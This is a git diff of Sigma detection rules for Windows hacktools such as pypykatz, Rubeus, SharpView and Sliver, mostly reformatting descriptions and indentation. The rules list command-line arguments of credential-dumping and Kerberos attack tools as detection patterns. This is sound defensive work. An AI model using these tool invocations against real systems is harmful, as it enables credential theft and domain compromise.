8b6ae959a..6dc681005 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_hktl_pypykatz.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_hktl_pypykatz.yml @@ -1,9 +1,7 @@ title: HackTool - Pypykatz Credentials Dumping Activity id: a29808fd-ef50-49ff-9c7a-59a9b040b404 status: test -description: Detects the usage of "pypykatz" to obtain stored credentials. Adversaries - may attempt to extract credential material from the Security Account Manager (SAM) - database through Windows registry where the SAM database is stored +description: Detects the usage of "pypykatz" to obtain stored credentials. Adversaries may attempt to extract credential material from the Security Account Manager (SAM) database through Windows registry where the SAM database is stored references: - https://github.com/skelsec/pypykatz - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1003.002/T1003.002.md#atomic-test-2---registry-parse-with-pypykatz @@ -25,7 +23,7 @@ detection: Image|endswith: - \pypykatz.exe - \python.exe - CommandLine|contains|all: + CommandLine|contains|all: - live - registry condition: process_creation and selection diff --git a/sigma/sysmon/process_creation/proc_creation_win_hktl_quarks_pwdump.yml b/sigma/sysmon/process_creation/proc_creation_win_hktl_quarks_pwdump.yml index 4d95df9f0..19762dc07 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_hktl_quarks_pwdump.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_hktl_quarks_pwdump.yml @@ -22,7 +22,7 @@ detection: selection_img: Image|endswith: \QuarksPwDump.exe selection_cli: - CommandLine: + CommandLine: - ' -dhl' - ' --dump-hash-local' - ' -dhdc' diff --git a/sigma/sysmon/process_creation/proc_creation_win_hktl_redmimicry_winnti_playbook.yml b/sigma/sysmon/process_creation/proc_creation_win_hktl_redmimicry_winnti_playbook.yml index 77bbd080c..9b5497181 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_hktl_redmimicry_winnti_playbook.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_hktl_redmimicry_winnti_playbook.yml @@ -1,8 +1,7 @@ title: HackTool - RedMimicry Winnti Playbook Execution id: 95022b85-ff2a-49fa-939a-d7b8f56eeb9b status: test -description: Detects actions caused by the RedMimicry Winnti playbook a automated - breach emulations utility +description: Detects actions caused by the RedMimicry Winnti playbook a automated breach emulations utility references: - https://redmimicry.com/posts/redmimicry-winnti/ author: Alexander Rausch @@ -26,7 +25,7 @@ detection: Image|endswith: - \rundll32.exe - \cmd.exe - CommandLine|contains: + CommandLine|contains: - gthread-3.6.dll - \Windows\Temp\tmp.bat - sigcmm-2.4.dll diff --git a/sigma/sysmon/process_creation/proc_creation_win_hktl_relay_attacks_tools.yml b/sigma/sysmon/process_creation/proc_creation_win_hktl_relay_attacks_tools.yml index 44c496032..b56393cbc 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_hktl_relay_attacks_tools.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_hktl_relay_attacks_tools.yml @@ -1,8 +1,7 @@ title: Potential SMB Relay Attack Tool Execution id: 5589ab4f-a767-433c-961d-c91f3f704db1 status: test -description: Detects different hacktools used for relay attacks on Windows for privilege - escalation +description: Detects different hacktools used for relay attacks on Windows for privilege escalation references: - https://foxglovesecurity.com/2016/09/26/rotten-potato-privilege-escalation-from-service-accounts-to-system/ - https://pentestlab.blog/2017/04/13/hot-potato/ @@ -40,22 +39,22 @@ detection: - \ntlmrelayx - \LocalPotato selection_script: - CommandLine|contains: + CommandLine|contains: - Invoke-Tater - ' smbrelay' - ' ntlmrelay' - 'cme smb ' - ' /ntlm:NTLMhash ' - Invoke-PetitPotam - - '.exe -t * -p ' - selection_juicypotato_enum: - CommandLine|contains: .exe -c "{ - CommandLine|endswith: '}" -z' - filter_hotpotatoes: + - '.exe -t * -p ' # JuicyPotatoNG pattern https://github.com/antonioCoco/JuicyPotatoNG + selection_juicypotato_enum: # appears when JuicyPotatoNG is used with -b + CommandLine|contains: .exe -c "{ + CommandLine|endswith: '}" -z' + filter_hotpotatoes: # known goodware https://hotpot.uvic.ca/ Image|contains: - HotPotatoes6 - HotPotatoes7 - - 'HotPotatoes ' + - 'HotPotatoes ' # Covers the following: 'HotPotatoes 6', 'HotPotatoes 7', 'HotPotatoes Help', 'HotPotatoes Tutorial' condition: process_creation and (1 of selection_* and not 1 of filter_*) falsepositives: - Legitimate files with these rare hacktool names diff --git a/sigma/sysmon/process_creation/proc_creation_win_hktl_rubeus.yml b/sigma/sysmon/process_creation/proc_creation_win_hktl_rubeus.yml index 1b86e9b45..6694755ac 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_hktl_rubeus.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_hktl_rubeus.yml @@ -1,11 +1,10 @@ title: HackTool - Rubeus Execution id: 7ec2c172-dceb-4c10-92c9-87c1881b7e18 related: - - id: 7ec2c172-dceb-4c10-92c9-87c1881b7e18 - type: similar + - id: 7ec2c172-dceb-4c10-92c9-87c1881b7e18 + type: similar status: stable -description: Detects the execution of the hacktool Rubeus via PE information of command - line parameters +description: Detects the execution of the hacktool Rubeus via PE information of command line parameters references: - https://blog.harmj0y.net/redteaming/from-kekeo-to-rubeus - https://m0chan.github.io/2019/07/31/How-To-Attack-Kerberos-101.html @@ -28,25 +27,25 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection: - - Image|endswith: \Rubeus.exe - - OriginalFileName: Rubeus.exe - - Description: Rubeus - - CommandLine|contains: - - 'asreproast ' - - 'dump /service:krbtgt ' - - dump /luid:0x - - 'kerberoast ' - - 'createnetonly /program:' - - 'ptt /ticket:' - - '/impersonateuser:' - - 'renew /ticket:' - - 'asktgt /user:' - - 'harvest /interval:' - - 's4u /user:' - - 's4u /ticket:' - - 'hash /password:' - - 'golden /aes256:' - - 'silver /user:' + - Image|endswith: \Rubeus.exe + - OriginalFileName: Rubeus.exe + - Description: Rubeus + - CommandLine|contains: + - 'asreproast ' + - 'dump /service:krbtgt ' + - dump /luid:0x + - 'kerberoast ' + - 'createnetonly /program:' + - 'ptt /ticket:' + - '/impersonateuser:' + - 'renew /ticket:' + - 'asktgt /user:' + - 'harvest /interval:' + - 's4u /user:' + - 's4u /ticket:' + - 'hash /password:' + - 'golden /aes256:' + - 'silver /user:' condition: process_creation and selection falsepositives: - Unlikely diff --git a/sigma/sysmon/process_creation/proc_creation_win_hktl_safetykatz.yml b/sigma/sysmon/process_creation/proc_creation_win_hktl_safetykatz.yml index c8d834997..12a93202c 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_hktl_safetykatz.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_hktl_safetykatz.yml @@ -1,8 +1,7 @@ title: HackTool - SafetyKatz Execution id: b1876533-4ed5-4a83-90f3-b8645840a413 status: test -description: Detects the execution of the hacktool SafetyKatz via PE information and - default Image name +description: Detects the execution of the hacktool SafetyKatz via PE information and default Image name references: - https://github.com/GhostPack/SafetyKatz author: Nasreddine Bencherchali (Nextron Systems) @@ -20,9 +19,9 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection: - - Image|endswith: \SafetyKatz.exe - - OriginalFileName: SafetyKatz.exe - - Description: SafetyKatz + - Image|endswith: \SafetyKatz.exe + - OriginalFileName: SafetyKatz.exe + - Description: SafetyKatz condition: process_creation and selection falsepositives: - Unlikely diff --git a/sigma/sysmon/process_creation/proc_creation_win_hktl_secutyxploded.yml b/sigma/sysmon/process_creation/proc_creation_win_hktl_secutyxploded.yml index 6c6a4e1d6..0a7924601 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_hktl_secutyxploded.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_hktl_secutyxploded.yml @@ -20,9 +20,9 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection: - - Company: SecurityXploded - - Image|endswith: PasswordDump.exe - - OriginalFileName|endswith: PasswordDump.exe + - Company: SecurityXploded + - Image|endswith: PasswordDump.exe + - OriginalFileName|endswith: PasswordDump.exe condition: process_creation and selection falsepositives: - Unlikely diff --git a/sigma/sysmon/process_creation/proc_creation_win_hktl_selectmyparent.yml b/sigma/sysmon/process_creation/proc_creation_win_hktl_selectmyparent.yml index 5cd024352..42b1263a5 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_hktl_selectmyparent.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_hktl_selectmyparent.yml @@ -1,8 +1,7 @@ title: HackTool - PPID Spoofing SelectMyParent Tool Execution id: 52ff7941-8211-46f9-84f8-9903efb7077d status: test -description: Detects the use of parent process ID spoofing tools like Didier Stevens - tool SelectMyParent +description: Detects the use of parent process ID spoofing tools like Didier Stevens tool SelectMyParent references: - https://pentestlab.blog/2020/02/24/parent-pid-spoofing/ - https://www.picussecurity.com/resource/blog/how-to-detect-parent-pid-ppid-spoofing-attacks @@ -23,35 +22,35 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection: - - Image|endswith: \SelectMyParent.exe - - CommandLine|contains: - - PPID-spoof - - ppid_spoof - - spoof-ppid - - spoof_ppid - - ppidspoof - - spoofppid - - spoofedppid - - ' -spawnto ' - - OriginalFileName|contains: - - PPID-spoof - - ppid_spoof - - spoof-ppid - - spoof_ppid - - ppidspoof - - spoofppid - - spoofedppid - - Description: SelectMyParent - - Imphash: - - 04d974875bd225f00902b4cad9af3fbc - - a782af154c9e743ddf3f3eb2b8f3d16e - - 89059503d7fbf470e68f7e63313da3ad - - ca28337632625c8281ab8a130b3d6bad - - Hashes|contains: - - IMPHASH=04D974875BD225F00902B4CAD9AF3FBC - - IMPHASH=A782AF154C9E743DDF3F3EB2B8F3D16E - - IMPHASH=89059503D7FBF470E68F7E63313DA3AD - - IMPHASH=CA28337632625C8281AB8A130B3D6BAD + - Image|endswith: \SelectMyParent.exe + - CommandLine|contains: + - PPID-spoof + - ppid_spoof + - spoof-ppid + - spoof_ppid + - ppidspoof + - spoofppid + - spoofedppid + - ' -spawnto ' + - OriginalFileName|contains: + - PPID-spoof + - ppid_spoof + - spoof-ppid + - spoof_ppid + - ppidspoof + - spoofppid + - spoofedppid + - Description: SelectMyParent + - Imphash: + - 04d974875bd225f00902b4cad9af3fbc + - a782af154c9e743ddf3f3eb2b8f3d16e + - 89059503d7fbf470e68f7e63313da3ad + - ca28337632625c8281ab8a130b3d6bad + - Hashes|contains: + - IMPHASH=04D974875BD225F00902B4CAD9AF3FBC + - IMPHASH=A782AF154C9E743DDF3F3EB2B8F3D16E + - IMPHASH=89059503D7FBF470E68F7E63313DA3AD + - IMPHASH=CA28337632625C8281AB8A130B3D6BAD condition: process_creation and selection falsepositives: - Unlikely diff --git a/sigma/sysmon/process_creation/proc_creation_win_hktl_sharp_chisel.yml b/sigma/sysmon/process_creation/proc_creation_win_hktl_sharp_chisel.yml index ca4903016..c1aba014e 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_hktl_sharp_chisel.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_hktl_sharp_chisel.yml @@ -1,8 +1,8 @@ title: HackTool - SharpChisel Execution id: cf93e05e-d798-4d9e-b522-b0248dc61eaf related: - - id: 8b0e12da-d3c3-49db-bb4f-256703f380e5 - type: similar + - id: 8b0e12da-d3c3-49db-bb4f-256703f380e5 + type: similar status: test description: Detects usage of the Sharp Chisel via the commandline arguments references: @@ -23,8 +23,9 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection: - - Image|endswith: \SharpChisel.exe - - Product: SharpChisel + - Image|endswith: \SharpChisel.exe + - Product: SharpChisel + # See rule 8b0e12da-d3c3-49db-bb4f-256703f380e5 for Chisel.exe coverage condition: process_creation and selection falsepositives: - Unlikely diff --git a/sigma/sysmon/process_creation/proc_creation_win_hktl_sharp_impersonation.yml b/sigma/sysmon/process_creation/proc_creation_win_hktl_sharp_impersonation.yml index a18c381ac..0e9a4e15a 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_hktl_sharp_impersonation.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_hktl_sharp_impersonation.yml @@ -1,11 +1,10 @@ title: HackTool - SharpImpersonation Execution id: f89b08d0-77ad-4728-817b-9b16c5a69c7a related: - - id: cf0c254b-22f1-4b2b-8221-e137b3c0af94 - type: similar + - id: cf0c254b-22f1-4b2b-8221-e137b3c0af94 + type: similar status: test -description: Detects execution of the SharpImpersonation tool. Which can be used to - manipulate tokens on a Windows computers remotely (PsExec/WmiExec) or interactively +description: Detects execution of the SharpImpersonation tool. Which can be used to manipulate tokens on a Windows computers remotely (PsExec/WmiExec) or interactively references: - https://s3cur3th1ssh1t.github.io/SharpImpersonation-Introduction/ - https://github.com/S3cur3Th1sSh1t/SharpImpersonation @@ -26,18 +25,18 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_img: - - Image|endswith: \SharpImpersonation.exe - - OriginalFileName: SharpImpersonation.exe + - Image|endswith: \SharpImpersonation.exe + - OriginalFileName: SharpImpersonation.exe selection_cli: - - CommandLine|contains|all: - - ' user:' - - ' binary:' - - CommandLine|contains|all: - - ' user:' - - ' shellcode:' - - CommandLine|contains: - - ' technique:CreateProcessAsUserW' - - ' technique:ImpersonateLoggedOnuser' + - CommandLine|contains|all: + - ' user:' + - ' binary:' + - CommandLine|contains|all: + - ' user:' + - ' shellcode:' + - CommandLine|contains: + - ' technique:CreateProcessAsUserW' + - ' technique:ImpersonateLoggedOnuser' condition: process_creation and (1 of selection_*) falsepositives: - Unknown diff --git a/sigma/sysmon/process_creation/proc_creation_win_hktl_sharp_ldap_monitor.yml b/sigma/sysmon/process_creation/proc_creation_win_hktl_sharp_ldap_monitor.yml index 010e990ed..07f7c79f7 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_hktl_sharp_ldap_monitor.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_hktl_sharp_ldap_monitor.yml @@ -1,8 +1,7 @@ title: HackTool - SharpLDAPmonitor Execution id: 9f8fc146-1d1a-4dbf-b8fd-dfae15e08541 status: test -description: Detects execution of the SharpLDAPmonitor. Which can monitor the creation, - deletion and changes to LDAP objects. +description: Detects execution of the SharpLDAPmonitor. Which can monitor the creation, deletion and changes to LDAP objects. references: - https://github.com/p0dalirius/LDAPmonitor author: Nasreddine Bencherchali (Nextron Systems) @@ -19,10 +18,10 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_img: - - Image|endswith: \SharpLDAPmonitor.exe - - OriginalFileName: SharpLDAPmonitor.exe + - Image|endswith: \SharpLDAPmonitor.exe + - OriginalFileName: SharpLDAPmonitor.exe selection_cli: - CommandLine|contains|all: + CommandLine|contains|all: - '/user:' - '/pass:' - '/dcip:' diff --git a/sigma/sysmon/process_creation/proc_creation_win_hktl_sharpersist.yml b/sigma/sysmon/process_creation/proc_creation_win_hktl_sharpersist.yml index 65a0f6090..bdf0c7a0a 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_hktl_sharpersist.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_hktl_sharpersist.yml @@ -1,8 +1,7 @@ title: HackTool - SharPersist Execution id: 26488ad0-f9fd-4536-876f-52fea846a2e4 status: test -description: Detects the execution of the hacktool SharPersist - used to deploy various - different kinds of persistence mechanisms +description: Detects the execution of the hacktool SharPersist - used to deploy various different kinds of persistence mechanisms references: - https://www.mandiant.com/resources/blog/sharpersist-windows-persistence-toolkit - https://github.com/mandiant/SharPersist @@ -21,22 +20,22 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_img: - - Image|endswith: \SharPersist.exe - - Product: SharPersist + - Image|endswith: \SharPersist.exe + - Product: SharPersist selection_cli_1: - CommandLine|contains: + CommandLine|contains: - ' -t schtask -c ' - ' -t startupfolder -c ' selection_cli_2: - CommandLine|contains|all: + CommandLine|contains|all: - ' -t reg -c ' - ' -m add' selection_cli_3: - CommandLine|contains|all: + CommandLine|contains|all: - ' -t service -c ' - ' -m add' selection_cli_4: - CommandLine|contains|all: + CommandLine|contains|all: - ' -t schtask -c ' - ' -m add' condition: process_creation and (1 of selection_*) diff --git a/sigma/sysmon/process_creation/proc_creation_win_hktl_sharpevtmute.yml b/sigma/sysmon/process_creation/proc_creation_win_hktl_sharpevtmute.yml index 2f4820bd0..7d300aa1c 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_hktl_sharpevtmute.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_hktl_sharpevtmute.yml @@ -1,11 +1,10 @@ title: HackTool - SharpEvtMute Execution id: bedfc8ad-d1c7-4e37-a20e-e2b0dbee759c related: - - id: 49329257-089d-46e6-af37-4afce4290685 - type: similar + - id: 49329257-089d-46e6-af37-4afce4290685 # DLL load + type: similar status: test -description: Detects the use of SharpEvtHook, a tool that tampers with the Windows - event logs +description: Detects the use of SharpEvtHook, a tool that tampers with the Windows event logs references: - https://github.com/bats3c/EvtMute author: Florian Roth (Nextron Systems) @@ -23,11 +22,11 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection: - - Image|endswith: \SharpEvtMute.exe - - Description: SharpEvtMute - - CommandLine|contains: - - '--Filter "rule ' - - --Encoded --Filter \" + - Image|endswith: \SharpEvtMute.exe + - Description: SharpEvtMute + - CommandLine|contains: + - '--Filter "rule ' + - --Encoded --Filter \" condition: process_creation and selection falsepositives: - Unknown diff --git a/sigma/sysmon/process_creation/proc_creation_win_hktl_sharpldapwhoami.yml b/sigma/sysmon/process_creation/proc_creation_win_hktl_sharpldapwhoami.yml index 3c52fbb5e..a9b246cf2 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_hktl_sharpldapwhoami.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_hktl_sharpldapwhoami.yml @@ -1,8 +1,7 @@ title: HackTool - SharpLdapWhoami Execution id: d9367cbb-c2e0-47ce-bdc0-128cb6da898d status: test -description: Detects SharpLdapWhoami, a whoami alternative that queries the LDAP service - on a domain controller +description: Detects SharpLdapWhoami, a whoami alternative that queries the LDAP service on a domain controller references: - https://github.com/bugch3ck/SharpLdapWhoami author: Florian Roth (Nextron Systems) @@ -22,11 +21,11 @@ detection: Channel: Microsoft-Windows-Sysmon/Operational selection_name: Image|endswith: \SharpLdapWhoami.exe - selection_pe: - - OriginalFileName|contains: SharpLdapWhoami - - Product: SharpLdapWhoami + selection_pe: # in case the file has been renamed after compilation + - OriginalFileName|contains: SharpLdapWhoami + - Product: SharpLdapWhoami selection_flags1: - CommandLine|endswith: + CommandLine|endswith: - ' /method:ntlm' - ' /method:kerb' - ' /method:nego' diff --git a/sigma/sysmon/process_creation/proc_creation_win_hktl_sharpup.yml b/sigma/sysmon/process_creation/proc_creation_win_hktl_sharpup.yml index 42f8902ad..ac285a4c4 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_hktl_sharpup.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_hktl_sharpup.yml @@ -21,16 +21,16 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection: - - Image|endswith: \SharpUp.exe - - Description: SharpUp - - CommandLine|contains: - - HijackablePaths - - UnquotedServicePath - - ProcessDLLHijack - - ModifiableServiceBinaries - - ModifiableScheduledTask - - DomainGPPPassword - - CachedGPPPassword + - Image|endswith: \SharpUp.exe + - Description: SharpUp + - CommandLine|contains: + - HijackablePaths + - UnquotedServicePath + - ProcessDLLHijack + - ModifiableServiceBinaries + - ModifiableScheduledTask + - DomainGPPPassword + - CachedGPPPassword condition: process_creation and selection falsepositives: - Unknown diff --git a/sigma/sysmon/process_creation/proc_creation_win_hktl_sharpview.yml b/sigma/sysmon/process_creation/proc_creation_win_hktl_sharpview.yml index 1c223a878..9fd0eee77 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_hktl_sharpview.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_hktl_sharpview.yml @@ -1,11 +1,10 @@ title: HackTool - SharpView Execution id: b2317cfa-4a47-4ead-b3ff-297438c0bc2d related: - - id: dcd74b95-3f36-4ed9-9598-0490951643aa - type: similar + - id: dcd74b95-3f36-4ed9-9598-0490951643aa + type: similar status: test -description: Adversaries may look for details about the network configuration and - settings of systems they access or through information discovery of remote systems +description: Adversaries may look for details about the network configuration and settings of systems they access or through information discovery of remote systems references: - https://github.com/tevora-threat/SharpView/ - https://github.com/PowerShellMafia/PowerSploit/blob/dev/Recon/PowerView.ps1 @@ -29,91 +28,117 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection: - - OriginalFileName: SharpView.exe - - Image|endswith: \SharpView.exe - - CommandLine|contains: - - Add-RemoteConnection - - Convert-ADName - - ConvertFrom-SID - - ConvertFrom-UACValue - - Convert-SidToName - - Export-PowerViewCSV - - Find-DomainObjectPropertyOutlier - - Find-DomainProcess - - Find-DomainShare - - Find-DomainUserEvent - - Find-DomainUserLocation - - Find-ForeignGroup - - Find-ForeignUser - - Find-GPOComputerAdmin - - Find-GPOLocation - - Find-Interesting - - Find-LocalAdminAccess - - Find-ManagedSecurityGroups - - Get-CachedRDPConnection - - Get-DFSshare - - Get-DomainComputer - - Get-DomainController - - Get-DomainDFSShare - - Get-DomainDNSRecord - - Get-DomainFileServer - - Get-DomainForeign - - Get-DomainGPO - - Get-DomainGroup - - Get-DomainGUIDMap - - Get-DomainManagedSecurityGroup - - Get-DomainObject - - Get-DomainOU - - Get-DomainPolicy - - Get-DomainSID - - Get-DomainSite - - Get-DomainSPNTicket - - Get-DomainSubnet - - Get-DomainTrust - - Get-DomainUserEvent - - Get-ForestDomain - - Get-ForestGlobalCatalog - - Get-ForestTrust - - Get-GptTmpl - - Get-GroupsXML - - Get-LastLoggedOn - - Get-LoggedOnLocal - - Get-NetComputer - - Get-NetDomain - - Get-NetFileServer - - Get-NetForest - - Get-NetGPO - - Get-NetGroupMember - - Get-NetLocalGroup - - Get-NetLoggedon - - Get-NetOU - - Get-NetProcess - - Get-NetRDPSession - - Get-NetSession - - Get-NetShare - - Get-NetSite - - Get-NetSubnet - - Get-NetUser - - Get-PathAcl - - Get-PrincipalContext - - Get-RegistryMountedDrive - - Get-RegLoggedOn - - Get-WMIRegCachedRDPConnection - - Get-WMIRegLastLoggedOn - - Get-WMIRegMountedDrive - - Get-WMIRegProxy - - Invoke-ACLScanner - - Invoke-CheckLocalAdminAccess - - Invoke-Kerberoast - - Invoke-MapDomainTrust - - Invoke-RevertToSelf - - Invoke-Sharefinder - - Invoke-UserImpersonation - - Remove-DomainObjectAcl - - Remove-RemoteConnection - - Request-SPNTicket - - Set-DomainObject - - Test-AdminAccess + - OriginalFileName: SharpView.exe + - Image|endswith: \SharpView.exe + - CommandLine|contains: + # - 'Add-DomainGroupMember' + # - 'Add-DomainObjectAcl' + # - 'Add-ObjectAcl' + - Add-RemoteConnection + - Convert-ADName + - ConvertFrom-SID + - ConvertFrom-UACValue + - Convert-SidToName + # - 'ConvertTo-SID' + - Export-PowerViewCSV + # - 'Find-DomainLocalGroupMember' + - Find-DomainObjectPropertyOutlier + - Find-DomainProcess + - Find-DomainShare + - Find-DomainUserEvent + - Find-DomainUserLocation + - Find-ForeignGroup + - Find-ForeignUser + - Find-GPOComputerAdmin + - Find-GPOLocation + - Find-Interesting # 'Find-InterestingDomainAcl', 'Find-InterestingDomainShareFile', 'Find-InterestingFile' + - Find-LocalAdminAccess + - Find-ManagedSecurityGroups + # - 'Get-ADObject' + - Get-CachedRDPConnection + - Get-DFSshare + # - 'Get-DNSRecord' + # - 'Get-DNSZone' + # - 'Get-Domain' + - Get-DomainComputer + - Get-DomainController + - Get-DomainDFSShare + - Get-DomainDNSRecord + # - 'Get-DomainDNSZone' + - Get-DomainFileServer + - Get-DomainForeign # 'Get-DomainForeignGroupMember', 'Get-DomainForeignUser' + - Get-DomainGPO # 'Get-DomainGPOComputerLocalGroupMapping', 'Get-DomainGPOLocalGroup', 'Get-DomainGPOUserLocalGroupMapping' + - Get-DomainGroup # 'Get-DomainGroupMember' + - Get-DomainGUIDMap + - Get-DomainManagedSecurityGroup + - Get-DomainObject # 'Get-DomainObjectAcl' + - Get-DomainOU + - Get-DomainPolicy # 'Get-DomainPolicyData' + - Get-DomainSID + - Get-DomainSite + - Get-DomainSPNTicket + - Get-DomainSubnet + - Get-DomainTrust # 'Get-DomainTrustMapping' + # - 'Get-DomainUser' + - Get-DomainUserEvent + # - 'Get-Forest' + - Get-ForestDomain + - Get-ForestGlobalCatalog + - Get-ForestTrust + - Get-GptTmpl + - Get-GroupsXML + # - 'Get-GUIDMap' + # - 'Get-IniContent' + # - 'Get-IPAddress' + - Get-LastLoggedOn + - Get-LoggedOnLocal + - Get-NetComputer # 'Get-NetComputerSiteName' + - Get-NetDomain # 'Get-NetDomainController', 'Get-NetDomainTrust' + - Get-NetFileServer + - Get-NetForest # 'Get-NetForestCatalog', 'Get-NetForestDomain', 'Get-NetForestTrust' + - Get-NetGPO # 'Get-NetGPOGroup' + # - 'Get-NetGroup' + - Get-NetGroupMember + - Get-NetLocalGroup # 'Get-NetLocalGroupMember' + - Get-NetLoggedon + - Get-NetOU + - Get-NetProcess + - Get-NetRDPSession + - Get-NetSession + - Get-NetShare + - Get-NetSite + - Get-NetSubnet + - Get-NetUser + # - 'Get-ObjectAcl' + - Get-PathAcl + - Get-PrincipalContext + # - 'Get-Proxy' + - Get-RegistryMountedDrive + - Get-RegLoggedOn + # - 'Get-SiteName' + # - 'Get-UserEvent' + # - 'Get-WMIProcess' + - Get-WMIRegCachedRDPConnection + - Get-WMIRegLastLoggedOn + - Get-WMIRegMountedDrive + - Get-WMIRegProxy + - Invoke-ACLScanner + - Invoke-CheckLocalAdminAccess + - Invoke-Kerberoast + - Invoke-MapDomainTrust + - Invoke-RevertToSelf + - Invoke-Sharefinder + - Invoke-UserImpersonation + # - 'New-DomainGroup' + # - 'New-DomainUser' + - Remove-DomainObjectAcl + - Remove-RemoteConnection + - Request-SPNTicket + # - 'Resolve-IPAddress' + # - 'Set-ADObject' + - Set-DomainObject + # - 'Set-DomainUserPassword' + - Test-AdminAccess condition: process_creation and selection falsepositives: - Unknown diff --git a/sigma/sysmon/process_creation/proc_creation_win_hktl_silenttrinity_stager.yml b/sigma/sysmon/process_creation/proc_creation_win_hktl_silenttrinity_stager.yml index fc65974e1..053ab567f 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_hktl_silenttrinity_stager.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_hktl_silenttrinity_stager.yml @@ -1,8 +1,8 @@ title: HackTool - SILENTTRINITY Stager Execution id: 03552375-cc2c-4883-bbe4-7958d5a980be related: - - id: 75c505b1-711d-4f68-a357-8c3fe37dbf2d - type: derived + - id: 75c505b1-711d-4f68-a357-8c3fe37dbf2d # DLL Load + type: derived status: test description: Detects SILENTTRINITY stager use via PE metadata references: diff --git a/sigma/sysmon/process_creation/proc_creation_win_hktl_sliver_c2_execution_pattern.yml b/sigma/sysmon/process_creation/proc_creation_win_hktl_sliver_c2_execution_pattern.yml index 218d4aebd..ed1daf31a 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_hktl_sliver_c2_execution_pattern.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_hktl_sliver_c2_execution_pattern.yml @@ -1,8 +1,7 @@ title: HackTool - Sliver C2 Implant Activity Pattern id: 42333b2c-b425-441c-b70e-99404a17170f status: test -description: Detects process activity patterns as seen being used by Sliver C2 framework - implants +description: Detects process activity patterns as seen being used by Sliver C2 framework implants references: - https://github.com/BishopFox/sliver/blob/79f2d48fcdfc2bee4713b78d431ea4b27f733f30/implant/sliver/shell/shell_windows.go#L36 - https://www.microsoft.com/security/blog/2022/08/24/looking-for-the-sliver-lining-hunting-for-emerging-command-and-control-frameworks/ @@ -21,7 +20,7 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection: - CommandLine|contains: -NoExit -Command [Console]::OutputEncoding=[Text.UTF8Encoding]::UTF8 + CommandLine|contains: -NoExit -Command [Console]::OutputEncoding=[Text.UTF8Encoding]::UTF8 condition: process_creation and selection falsepositives: - Unlikely diff --git a/sigma/sysmon/process_creation/proc_creation_win_hktl_stracciatella_execution.yml b/sigma/sysmon/process_creation/proc_creation_win_hktl_stracciatella_execution.yml index 381767cbd..e722ffda9 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_hktl_stracciatella_execution.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_hktl_stracciatella_execution.yml @@ -1,9 +1,7 @@ title: HackTool - Stracciatella Execution id: 7a4d9232-92fc-404d-8ce1-4c92e7caf539 status: experimental -description: Detects Stracciatella which executes a Powershell runspace from within - C# (aka SharpPick technique) with AMSI, ETW and Script Block Logging disabled - based on PE metadata characteristics. +description: Detects Stracciatella which executes a Powershell runspace from within C# (aka SharpPick technique) with AMSI, ETW and Script Block Logging disabled based on PE metadata characteristics. references: - https://github.com/mgeeky/Stracciatella author: pH-T (Nextron Systems) @@ -22,17 +20,18 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection: - - Image|endswith: \Stracciatella.exe - - OriginalFileName: Stracciatella.exe - - Description: Stracciatella - - Hashes|contains: - - SHA256=9d25e61ec1527e2a69d7c2a4e3fe2fe15890710c198a66a9f25d99fdf6c7b956 - - SHA256=fd16609bd9830c63b9413671678bb159b89c357d21942ddbb6b93add808d121a - - sha256: - - 9d25e61ec1527e2a69d7c2a4e3fe2fe15890710c198a66a9f25d99fdf6c7b956 - - fd16609bd9830c63b9413671678bb159b89c357d21942ddbb6b93add808d121a + - Image|endswith: \Stracciatella.exe + - OriginalFileName: Stracciatella.exe + - Description: Stracciatella + - Hashes|contains: + - SHA256=9d25e61ec1527e2a69d7c2a4e3fe2fe15890710c198a66a9f25d99fdf6c7b956 + - 